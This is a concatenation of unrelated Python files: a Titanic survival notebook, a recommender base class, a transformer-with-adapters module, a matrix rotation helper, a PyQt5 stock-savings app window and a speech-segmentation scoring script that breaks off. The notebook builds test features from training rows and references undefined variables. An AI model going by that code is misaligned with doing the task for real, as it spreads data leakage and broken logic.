#Nearly 2/3 of the sampled passengers embarked at S=Southampton.
# In[ ]:
titanic_train.groupby(['Embarked','Pclass'])['Name'].count()
#We can see that there is a correlation between Pclass and Embarked. For example, %50 of people who embarked at C=Cherbough
#are in class 1 while most of people who embarked at Q=Queenstown are in class 3.
# In[ ]:
#We now modify our dataset to make it more suitable for implementing some machine learning techniques.
#First, we need to fill in the missing age. There are only 714 available observations out of 891 datas.
#We will fill these NA (of both training and test datasets) by the age median groupby Pclass and Sex.
def fill_na_age(df):
age_median_by_group = pd.DataFrame(df.groupby(['Sex', 'Pclass'])['Age'].median().reset_index())
age_median_by_group.columns = ['Sex', 'Pclass', 'Median_age']
df = pd.merge(df, age_median_by_group, on = ['Sex', 'Pclass'])
df['Age'] = df['Age'].fillna(df['Median_age'])
df.drop('Median_age', axis=1)
return df
titanic_train = fill_na_age(titanic_train)
titanic_test = fill_na_age(titanic_test)
# In[ ]:
#Convert the Sex column into numerical variable, Embarked column into numerical variable
titanic_train['Sex'] = titanic_train['Sex'].map({'female': 10, 'male': 1}).astype(int)
titanic_test['Sex'] = titanic_test['Sex'].map({'female': 10, 'male': 1}).astype(int)
# In[ ]:
#Make age_range column as a new categorical variable
def create_age_range(df):
bins = [0, 5, 16, 30, 45, 60, 75, 80]
age_range = ['0-5', '5-16', '16-30','30-45', '45-60', '60-75', '75-']
df['age_range'] = pd.cut(df['Age'], bins, labels=age_range)
return df
titanic_train = create_age_range(titanic_train)
titanic_test = create_age_range(titanic_test)
#Change the age_range column as a new categorical variable
titanic_train['age_range'] = titanic_train['age_range'].map({'0-5':0, '5-16':1, '16-30':2,'30-45':3, '45-60':4, '60-75':5, '75-':6}).astype(int)
titanic_test['age_range'] = titanic_test['age_range'].map({'0-5':0, '5-16':1, '16-30':2,'30-45':3, '45-60':4, '60-75':5, '75-':6}).astype(int)
# In[ ]:
#Change the Age column to int type
titanic_train['Age'] = titanic_train['Age'].astype(int)
titanic_test['Age'] = titanic_test['Age'].astype(int)
# In[ ]:
#Let's analyze SibSp and Parch by creating a new column Companion: counting the number of family members who were with the passenger.
titanic_train['Companion'] = titanic_train['SibSp'] + titanic_train['Parch']
titanic_test['Companion'] = titanic_train['SibSp'] + titanic_train['Parch']
titanic_train.groupby('Companion')[['Survived', 'Sex']].agg(['mean', 'count'])
#There is some correlation between Companion and Sex. Quite the majority of passengers do not have companion.
#Passengers without companion are 75% male, while passengers with 1 or 2 companions are only 50% male.
#The survival rate of each group (grouped by the number of companions) are also very different.
# In[ ]:
# We eliminate Passenger ID because they are probably not correlated with being survived or not. The Cabin column
# is very incomplete, only 204 data points. We finally also drop SibSp, Parch while keep Companion
train_var = ['Sex', 'Age', 'Pclass', 'Fare', 'Embarked', 'Companion', 'age_range', 'Survived']
titanic_train = titanic_train[train_var]
test_var = ['PassengerId', 'Sex', 'Age', 'Pclass', 'Fare', 'Embarked', 'age_range', 'Companion']
titanic_test = titanic_test[test_var]
titanic_train.head()
#In this training sample, the survived rate is 38.3%
#The mean age is 29.69.
#At least 75% of the sampled passengers are in class 2 or 3, with more than 50% are in class 3.
# In[ ]:
#Checking the test file, we see that there is a missing entry in Fare and two missing entries in Embarked.
#We will fill the NA in Fare with the median, while NA in Embarked in the most frequent entry in test.
titanic_test['Fare'] = titanic_test['Fare'].fillna(titanic_test['Fare'].median())
titanic_train['Embarked'] = titanic_train['Embarked'].fillna(titanic_train['Embarked'].dropna().mode()[0])
titanic_test['Embarked'] = titanic_test['Embarked'].fillna(titanic_test['Embarked'].mode()[0])
# In[ ]:
#Change the Embarked from a categorical variable to a numerical variable
titanic_train['Embarked'] = titanic_train['Embarked'].map({'C': 3,'Q': 2, 'S':1}).astype(int)
titanic_test['Embarked'] = titanic_test['Embarked'].map({'C': 3,'Q':2, 'S': 1}).astype(int)
# In[ ]:
# Add extra variable for the Titanic:
titanic_train['Emb_Sex'] = titanic_train['Embarked']*titanic_train['Sex']
titanic_test['Emb_Sex'] = titanic_test['Embarked']*titanic_train['Sex']
titanic_train['P_sex'] = titanic_train['Pclass']*titanic_train['Sex']
titanic_test['P_sex'] = titanic_test['Pclass']*titanic_train['Sex']
# In[ ]:
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC, LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
# In[ ]:
X_train = titanic_train.drop('Survived', axis=1)
Y_train = titanic_train['Survived']
X_test = titanic_test.drop('PassengerId', axis=1)
titanic_train.head()
# In[ ]:
score = {}
X_tr, X_te, Y_tr, Y_te = train_test_split(X_train, Y_train , test_size = 0.2, random_state=1)
# Logistic Regression
logreg = LogisticRegression()
logreg.fit(X_tr, Y_tr)
Y_pred = logreg.predict(X_te)
Y_pred_prob = logreg.predict_proba(X_te)[:,1]
fpr, tpr, thresholds = roc_curve(Y_te, Y_pred_prob)
# Plot ROC curve
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC Curve')
plt.show()
print(confusion_matrix(Y_pred, Y_te))
print(roc_auc_score(Y_te, Y_pred_prob))
# In[ ]:
log_regression = LogisticRegression()
log_regression.fit(X_train, Y_train)
Y_pred = log_regression.predict(X_test)
score['Logistic Regression'] = log_regression.score(X_train, Y_train)
my_submission = pd.DataFrame({'PassengerId': titanic_test['PassengerId'], 'Survived': Y_pred})
my_submission.to_csv('submission.csv', index=False)
# In[ ]:
#When I tried these models on the test set, the results were only 75%. Maybe we have overfitting problem. Let's take away a few columns
#that have strong correlation with other variables.
train_var = ['Sex', 'Age', 'Pclass', 'age_range', 'Survived']
titanic_train = titanic_train[train_var]
test_var = ['PassengerId', 'Sex', 'Age', 'Pclass', 'age_range']
titanic_test = titanic_test[test_var]
X_train = titanic_train.drop('Survived', axis=1)
Y_train = titanic_train['Survived']
X_test = titanic_test.drop('PassengerId', axis=1)
# In[ ]:
score = {}
# Logistic Regression
logreg = LogisticRegression()
logreg.fit(X_train, Y_train)
Y_pred = logreg.predict(X_test)
score['LogisticRegression'] = logreg.score(X_train, Y_train)
print(confusion_matrix(y_test, y_pred))
print(classification_report(y_test, y_pred))
# In[ ]:
result = pd.DataFrame([score]).T
result.columns = ['Score']
result
# In[ ]:
#SVC
svc = SVC()
svc.fit(X_train, Y_train)
Y_pred = svc.predict(X_test)
score['SVC'] = svc.score(X_train, Y_train)
#Linear SVC
Linear_svc = LinearSVC()
Linear_svc.fit(X_train, Y_train)
Y_pred = Linear_svc.predict(X_test)
score['LinearSVC'] = Linear_svc.score(X_train, Y_train)
#DecisionTreeClassifier
decision_tree = DecisionTreeClassifier()
decision_tree.fit(X_train, Y_train)
Y_pred = decision_tree.predict(X_test)
score['DecisionTreeClassifier'] = decision_tree.score(X_train, Y_train)
#RandomForest
random_forest = RandomForestClassifier()
random_forest.fit(X_train, Y_train)
Y_pred = random_forest.predict(X_test)
score['RandomForestClassifier'] = random_forest.score(X_train, Y_train)
#KNeighborsClassifier
knbor = KNeighborsClassifier()
knbor.fit(X_train, Y_train)
Y_pred = knbor.predict(X_test)
score['KneighborsClassifier'] = knbor.score(X_train, Y_train)
# In[ ]:
result = pd.DataFrame([score]).T
result.columns = ['Score']
result
# In[ ]:
# In[ ]:
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from sklearn.externals import six
from abc import ABCMeta, abstractmethod
from ..base import BaseRecommender
__all__ = [
'BaseCollaborativeFiltering'
]
class BaseCollaborativeFiltering(six.with_metaclass(ABCMeta, BaseRecommender)):
"""Base class for all collaborative filtering methods.
Collaborative filtering is a family of recommender system algorithms that
learn patterns based on the ratings history of users. The collaborative
filtering algorithms implemented in reclab learn from ratings matrices
only.
"""
@abstractmethod
def fit(self, X):
"""Fit the recommender on the ratings history of users.
Trains the model, learning its parameters based only on the ratings
history of a system's users.
Parameters
----------
X : scipy.sparse.csr_matrix
The sparse ratings matrix with users along the row axis and items
along the column axis. Entries represent ratings or other implicit
ranking events (i.e., number of listens, etc.)
"""
@staticmethod
def _initialize_factors(estimator, n_users, n_items, factors,
dtype, random_state):
"""Initialize the factor matrices.
Implicit does not allow us to control seeding of the matrices, but
it does allow us to provide our own matrices! This is the only way
we can control reproducibility.
"""
# XXX: we could also make the initialization strategy a tuning param?
estimator.user_factors = \
random_state.rand(n_users, factors).astype(dtype) * 0.01
estimator.item_factors = \
random_state.rand(n_items, factors).astype(dtype) * 0.01
return estimator
class BaseMatrixFactorization(six.with_metaclass(ABCMeta,
BaseCollaborativeFiltering)):
"""Base class for all collaborative filtering methods with matrix
factorization. Allows us to abstract out some of the method documentation.
"""
@abstractmethod
def recommend_for_user(self, userid, R, n=10, filter_previously_rated=True,
filter_items=None, return_scores=False,
recalculate_user=False):
"""Produce a recommendation for a user.
Compute a user's recommendations as a product of his/her ratings
history and the extracted latent factors for users and items.
Parameters
----------
userid : int
The positional index along the row axis of the user in the
ratings matrix.
R : scipy.sparse.csr_matrix
The sparse ratings matrix of users (along the row axis) and items
(along the column axis)
n : int, optional (default=10)
The number of items to recommend for the given user.
filter_previously_rated : bool, optional (default=True)
Whether to filter items that have been previously rated by the
user. True by default.
filter_items : array-like or None, optional (default=None)
Any items that should be filtered out of the recommend operation.
return_scores : bool, optional (default=False)
Whether to return the scores for each item for the user.
recalculate_user : bool, optional (default=False)
Whether to recalculate the user factor.
"""
|
import sys
_module = sys.modules[__name__]
del sys
classifiers = _module
tree2tabular = _module
explainer = _module
plotter = _module
predictor = _module
train_fasttext = _module
train_flair = _module
train_transformer = _module
loader = _module
model = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
import numpy as np
import scipy
import sklearn.pipeline
from typing import List
from typing import Any
import torch
from torch.utils.data import TensorDataset
from torch.utils.data import random_split
from torch.utils.data import DataLoader
from typing import Tuple
import torch.nn as nn
class Transformer(nn.Module):
def __init__(self, embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal):
super().__init__()
self.causal = causal
self.tokens_embeddings = nn.Embedding(num_embeddings, embed_dim)
self.position_embeddings = nn.Embedding(num_max_positions, embed_dim)
self.dropout = nn.Dropout(dropout)
self.attentions, self.feed_forwards = nn.ModuleList(), nn.ModuleList()
self.layer_norms_1, self.layer_norms_2 = nn.ModuleList(), nn.ModuleList()
for _ in range(num_layers):
self.attentions.append(nn.MultiheadAttention(embed_dim, num_heads, dropout=dropout))
self.feed_forwards.append(nn.Sequential(nn.Linear(embed_dim, hidden_dim), nn.ReLU(), nn.Linear(hidden_dim, embed_dim)))
self.layer_norms_1.append(nn.LayerNorm(embed_dim, eps=1e-12))
self.layer_norms_2.append(nn.LayerNorm(embed_dim, eps=1e-12))
def forward(self, x, padding_mask=None):
""" x has shape [seq length, batch], padding_mask has shape [batch, seq length] """
positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
h = self.tokens_embeddings(x)
h = h + self.position_embeddings(positions).expand_as(h)
h = self.dropout(h)
attn_mask = None
if self.causal:
attn_mask = torch.full((len(x), len(x)), -float('Inf'), device=h.device, dtype=h.dtype)
attn_mask = torch.triu(attn_mask, diagonal=1)
for layer_norm_1, attention, layer_norm_2, feed_forward in zip(self.layer_norms_1, self.attentions, self.layer_norms_2, self.feed_forwards):
h = layer_norm_1(h)
x, _ = attention(h, h, h, attn_mask=attn_mask, need_weights=False, key_padding_mask=padding_mask)
x = self.dropout(x)
h = x + h
h = layer_norm_2(h)
x = feed_forward(h)
x = self.dropout(x)
h = x + h
return h
class TransformerWithAdapters(Transformer):
def __init__(self, adapters_dim, embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal):
""" Transformer with adapters (small bottleneck layers) """
super().__init__(embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal)
self.adapters_1 = nn.ModuleList()
self.adapters_2 = nn.ModuleList()
for _ in range(num_layers):
self.adapters_1.append(nn.Sequential(nn.Linear(embed_dim, adapters_dim), nn.ReLU(), nn.Linear(adapters_dim, embed_dim)))
self.adapters_2.append(nn.Sequential(nn.Linear(embed_dim, adapters_dim), nn.ReLU(), nn.Linear(adapters_dim, embed_dim)))
def forward(self, x, padding_mask=None):
""" x has shape [seq length, batch], padding_mask has shape [batch, seq length] """
positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
h = self.tokens_embeddings(x)
h = h + self.position_embeddings(positions).expand_as(h)
h = self.dropout(h)
attn_mask = None
if self.causal:
attn_mask = torch.full((len(x), len(x)), -float('Inf'), device=h.device, dtype=h.dtype)
attn_mask = torch.triu(attn_mask, diagonal=1)
for layer_norm_1, attention, adapter_1, layer_norm_2, feed_forward, adapter_2 in zip(self.layer_norms_1, self.attentions, self.adapters_1, self.layer_norms_2, self.feed_forwards, self.adapters_2):
h = layer_norm_1(h)
x, _ = attention(h, h, h, attn_mask=attn_mask, need_weights=False, key_padding_mask=padding_mask)
x = self.dropout(x)
x = adapter_1(x) + x
h = x + h
h = layer_norm_2(h)
x = feed_forward(h)
x = self.dropout(x)
x = adapter_2(x) + x
h = x + h
return h
class TransformerWithClfHeadAndAdapters(nn.Module):
def __init__(self, config, fine_tuning_config):
""" Transformer with a classification head and adapters. """
super().__init__()
self.config = fine_tuning_config
if fine_tuning_config.adapters_dim > 0:
self.transformer = TransformerWithAdapters(fine_tuning_config.adapters_dim, config.embed_dim, config.hidden_dim, config.num_embeddings, config.num_max_positions, config.num_heads, config.num_layers, fine_tuning_config.dropout, causal=not config.mlm)
else:
self.transformer = Transformer(config.embed_dim, config.hidden_dim, config.num_embeddings, config.num_max_positions, config.num_heads, config.num_layers, fine_tuning_config.dropout, causal=not config.mlm)
self.classification_head = nn.Linear(config.embed_dim, fine_tuning_config.num_classes)
self.apply(self.init_weights)
def init_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
module.weight.data.normal_(mean=0.0, std=self.config.init_range)
if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
module.bias.data.zero_()
def forward(self, x, clf_tokens_mask, lm_labels=None, clf_labels=None, padding_mask=None):
hidden_states = self.transformer(x, padding_mask)
clf_tokens_states = (hidden_states * clf_tokens_mask.unsqueeze(-1).float()).sum(dim=0)
clf_logits = self.classification_head(clf_tokens_states)
if clf_labels is not None:
loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
loss = loss_fct(clf_logits.view(-1, clf_logits.size(-1)), clf_labels.view(-1))
return clf_logits, loss
return clf_logits
|
def rotate_a_matrix_by_90_degree(matrix):
new_matrix = []
for i in range(len(matrix)):
temp = []
for row in matrix:
temp.append(row[i])
new_matrix.append(list(reversed(temp)))
return new_matrix |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'home.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from StockData import Ui_StockData
from StockSearching import Ui_StockSearching
from StockCalc import Ui_StockCalc
class Ui_Home(object):
def setupUi(self, Home, prewindow):
Home.setObjectName("Home")
Home.resize(519, 510)
Home.setStyleSheet("background-color: rgb(205, 219, 231);")
self.lblRealPrice = QtWidgets.QLabel(Home)
self.lblRealPrice.setGeometry(QtCore.QRect(190, 510, 131, 21))
font = QtGui.QFont()
font.setPointSize(12)
self.lblRealPrice.setFont(font)
self.lblRealPrice.setText("")
self.lblRealPrice.setObjectName("lblRealPrice")
self.pushButton = QtWidgets.QPushButton(Home)
self.pushButton.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
self.pushButton.setGeometry(QtCore.QRect(170, 300, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Home)
self.pushButton_2.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
self.pushButton_2.setGeometry(QtCore.QRect(170, 220, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_2.setFont(font)
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Home)
self.pushButton_3.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
self.pushButton_3.setGeometry(QtCore.QRect(170, 140, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_3.setFont(font)
self.pushButton_3.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.pushButton_3.setObjectName("pushButton_3")
self.btnLogout = QtWidgets.QPushButton(Home)
self.btnLogout.setGeometry(QtCore.QRect(10, 480, 75, 23))
self.btnLogout.setCheckable(False)
self.btnLogout.setAutoRepeat(False)
self.btnLogout.setAutoExclusive(False)
self.btnLogout.setDefault(False)
self.btnLogout.setFlat(True)
self.btnLogout.setObjectName("btnLogout")
self.btnLogout.setStyleSheet("color: rgb(105, 147, 184);")
self.label_5 = QtWidgets.QLabel(Home)
self.label_5.setGeometry(QtCore.QRect(410, 20, 31, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.lblUserName = QtWidgets.QLabel(Home)
self.lblUserName.setGeometry(QtCore.QRect(450, 20, 101, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_3.clicked.connect(self.showStockData)
self.pushButton_2.clicked.connect(self.showStockSearch)
self.pushButton.clicked.connect(self.showStockCalc)
self.btnLogout.clicked.connect(self.logout)
self.thiswindow = Home
self.prewindow = prewindow
self.retranslateUi(Home)
QtCore.QMetaObject.connectSlotsByName(Home)
def logout(self):
self.thiswindow.hide()
self.prewindow.show()
def showStockCalc(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockCalc()
self.ui.setupUi(self.window,self.thiswindow)
self.thiswindow.hide()
self.window.show()
def showStockSearch(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockSearching()
self.ui.setupUi(self.window,self.thiswindow)
self.thiswindow.hide()
self.window.show()
def showStockData(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockData()
self.ui.setupUi(self.window,self.thiswindow)
self.thiswindow.hide()
self.window.show()
def retranslateUi(self, Home):
_translate = QtCore.QCoreApplication.translate
Home.setWindowTitle(_translate("Home", "โปรแกรมคำนวณเงินออมสะสมหุ้น"))
self.pushButton.setText(_translate("Home", "คำนวณรายการออมหุ้น"))
self.pushButton_2.setText(_translate("Home", "ค้นหารายชื่อหุ้นที่ทำรายการ"))
self.pushButton_3.setText(_translate("Home", "เพิ่มรายการหุ้นจดทะเบียน"))
self.btnLogout.setText(_translate("Home", "Logout"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Home = QtWidgets.QDialog()
ui = Ui_Home()
ui.setupUi(Home)
Home.show()
sys.exit(app.exec_())
|
#!/usr/bin/python
import argparse, sys, os, glob
import numpy as np
from argparse import ArgumentParser
frame_shift = 0.01
def mean(x):
try:
return float(sum(x))/len(x)
except Exception:
return 0
class Analysis:
def __init__(self, options = None):
self.sil_as_sil = 0
self.sil_as_noise = 0
self.sil_as_speech = 0
self.noise_as_sil = 0
self.noise_as_noise = 0
self.noise_as_speech = 0
self.speech_as_sil = 0
self.speech_as_noise = 0
self.speech_as_speech = 0
self.state_count = [ [] for i in range(0,9) ]
self.markers = [ [] for i in range(0,9) ]
self.min_length = [0] * 9
self.max_length = [0] * 9
self.mean_length = [0] * 9
self.percentile25 = [0] * 9
self.percentile50 = [0] * 9
self.percentile75 = [0] * 9
self.write_length_stats = options.write_length_stats
self.write_markers = options.write_markers
def write(self, file_handle = sys.stdout):
file_handle.write("%20s: %2.3f hrs\n" % ("True Silence", float(self.true_silence)*frame_shift/60/60))
file_handle.write("%20s: %2.3f hrs\n" % ("True Noise", float(self.true_noise)*frame_shift/60/60))
file_handle.write("%20s: %2.3f hrs\n" % ("True Speech", float(self.true_speech)*frame_shift/60/60))
file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Silence", float(self.predicted_silence)*frame_shift/60/60))
file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Noise", float(self.predicted_noise)*frame_shift/60/60))
file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Speech", float(self.predicted_speech)*frame_shift/60/60))
if self.true_silence != 0:
file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Silence", self.sil_as_sil , float(self.sil_as_sil *100)/ self.true_silence ))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Noise", self.sil_as_noise , float(self.sil_as_noise *100)/ self.true_silence ))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Speech", self.sil_as_speech , float(self.sil_as_speech *100)/ self.true_silence ))
if self.true_noise != 0:
file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Silence", self.noise_as_sil , float(self.noise_as_sil *100)/ self.true_noise ))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Noise", self.noise_as_noise , float(self.noise_as_noise *100)/ self.true_noise ))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Speech", self.noise_as_speech , float(self.noise_as_speech *100)/ self.true_noise ))
if self.true_speech != 0:
file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Silence", self.speech_as_sil , float(self.speech_as_sil *100)/self.true_speech))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Noise", self.speech_as_noise , float(self.speech_as_noise *100)/self.true_speech))
file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Speech", self.speech_as_speech , float(self.speech_as_speech*100)/self.true_speech))
if self.write_length_stats:
for i in range(0,9):
self.max_length[i] = max([0]+self.state_count[i])
self.min_length[i] = min([10000]+self.state_count[i])
self.mean_length[i] = mean(self.state_count[i])
try:
self.percentile25[i] = np.percentile(self.state_count[i], 25)
except ValueError:
self.percentile25[i] = 0
try:
self.percentile50[i] = np.percentile(self.state_count[i], 50)
except ValueError:
self.percentile50[i] = 0
try:
self.percentile75[i] = np.percentile(self.state_count[i], 75)
except ValueError:
self.percentile75[i] = 0
file_handle.write("Lengths of different segments:\n")
file_handle.write("%40s:\n %s\n" % ("Silence classified as Silence", str(self.state_count[0]) ))
file_handle.write("%40s:\n %s\n" % ("Silence classified as Noise", str(self.state_count[1]) ))
file_handle.write("%40s:\n %s\n" % ("Silence classified as Speech", str(self.state_count[2]) ))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Silence", str(self.state_count[3]) ))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Noise", str(self.state_count[4]) ))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Speech", str(self.state_count[5]) ))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Silence", str(self.state_count[6]) ))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Noise", str(self.state_count[7]) ))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Speech", str(self.state_count[8]) ))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Silence", self.min_length[0], self.max_length[0], self.mean_length[0], self.percentile25[0], self.percentile50[0], self.percentile75[0]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Noise", self.min_length[1], self.max_length[1], self.mean_length[1], self.percentile25[1], self.percentile50[1], self.percentile75[1]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Speech", self.min_length[2], self.max_length[2], self.mean_length[2], self.percentile25[2], self.percentile50[2], self.percentile75[2]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Silence", self.min_length[3], self.max_length[3], self.mean_length[3], self.percentile25[3], self.percentile50[3], self.percentile75[3]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Noise", self.min_length[4], self.max_length[4], self.mean_length[4], self.percentile25[4], self.percentile50[4], self.percentile75[4]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Speech", self.min_length[5], self.max_length[5], self.mean_length[5], self.percentile25[5], self.percentile50[5], self.percentile75[5]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Silence", self.min_length[6], self.max_length[6], self.mean_length[6], self.percentile25[6], self.percentile50[6], self.percentile75[6]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Noise", self.min_length[7], self.max_length[7], self.mean_length[7], self.percentile25[7], self.percentile50[7], self.percentile75[7]))
file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Speech", self.min_length[8], self.max_length[8], self.mean_length[8], self.percentile25[8], self.percentile50[8], self.percentile75[8]))
if self.write_markers:
file_handle.write("Start frames of different segments:\n")
file_handle.write("%40s:\n %s\n" % ("Silence classified as Silence", str([str(self.markers[0][i])+' ('+ str(self.state_count[0][i])+')' for i in range(0, len(self.state_count[0]))])))
file_handle.write("%40s:\n %s\n" % ("Silence classified as Noise", str([str(self.markers[1][i])+' ('+ str(self.state_count[1][i])+')' for i in range(0, len(self.state_count[1]))])))
file_handle.write("%40s:\n %s\n" % ("Silence classified as Speech", str([str(self.markers[2][i])+' ('+ str(self.state_count[2][i])+')' for i in range(0, len(self.state_count[2]))])))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Silence", str([str(self.markers[3][i])+' ('+ str(self.state_count[3][i])+')' for i in range(0, len(self.state_count[3]))])))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Noise", str([str(self.markers[4][i])+' ('+ str(self.state_count[4][i])+')' for i in range(0, len(self.state_count[4]))])))
file_handle.write("%40s:\n %s\n" % ("Noise classified as Speech", str([str(self.markers[5][i])+' ('+ str(self.state_count[5][i])+')' for i in range(0, len(self.state_count[5]))])))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Silence", str([str(self.markers[6][i])+' ('+ str(self.state_count[6][i])+')' for i in range(0, len(self.state_count[6]))])))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Noise", str([str(self.markers[7][i])+' ('+ str(self.state_count[7][i])+')' for i in range(0, len(self.state_count[7]))])))
file_handle.write("%40s:\n %s\n" % ("Speech classified as Speech", str([str(self.markers[8][i])+' ('+ str(self.state_count[8][i])+')' for i in range(0, len(self.state_count[8]))])))
def compute_stats(self):
self.true_silence = self.sil_as_sil + self.sil_as_noise + self.sil_as_speech
self.true_noise = self.noise_as_sil + self.noise_as_noise + self.noise_as_speech
self.true_speech = self.speech_as_sil + self.speech_as_noise + self.speech_as_speech
self.predicted_silence = self.sil_as_sil + self.noise_as_sil + self.speech_as_sil
self.predicted_noise = self.sil_as_noise + self.noise_as_noise + self.speech_as_noise
self.predicted_speech = self.sil_as_speech + self.noise_as_speech + self.speech_as_speech
def main():
parser = ArgumentParser(description='Analyse segmentation using force alignment data')
parser.add_argument('-l','--print-length-stats', dest='write_length_stats', action='store_true', help='Print length of the difference classes')
parser.add_argument('-m','--print-start-markers', dest='write_markers', action='store_true', help='Print start markers of the difference classes')
parser.add_argument('args', nargs=2, help='<reference_dir> <prediction_dir>')
options = parser.parse_args()
reference_dir = options.args[0]
prediction_dir = options.args[1]
reference = dict([ (f.split('/')[-1][0:-4], []) for f in glob.glob(reference_dir + "/*.ref") ])
prediction = dict([ (f.split('/')[-1][0:-5], []) for f in glob.glob(prediction_dir + "/*.pred") ])
per_file_diff = {}
frame_diff = Analysis(options)
frame_diff.write_markers = False
for file_id in prediction:
try:
this_pred = open(prediction_dir+"/"+file_id+".pred").readline().strip().split()[1:]
except IOError:
sys.stderr.write("Unable to open " + prediction_dir+"/"+file_id+".pred\tSkipping utterance\n")
continue
if file_id not in reference:
sys.stderr.write(reference_dir+"/"+file_id+".ref not found\tSkipping utterance\n")
continue
try:
this_ref = open(reference_dir+"/"+file_id+".ref").readline().strip().split()[1:]
except IOError:
sys.stderr.write("Unable to open " + reference_dir+"/"+file_id+".ref\tSkipping utterance\n")
continue
this_frame_diff = Analysis(options)
this_len = len(this_pred)
if len(this_ref) > this_len:
this_pred.extend(["0"]*(len(this_ref) - this_len))
this_len = len(this_ref)
elif len(this_ref) < this_len:
this_ref.extend(["0"]*(this_len - len(this_ref)))
this_len = len(this_ref)
count = 0
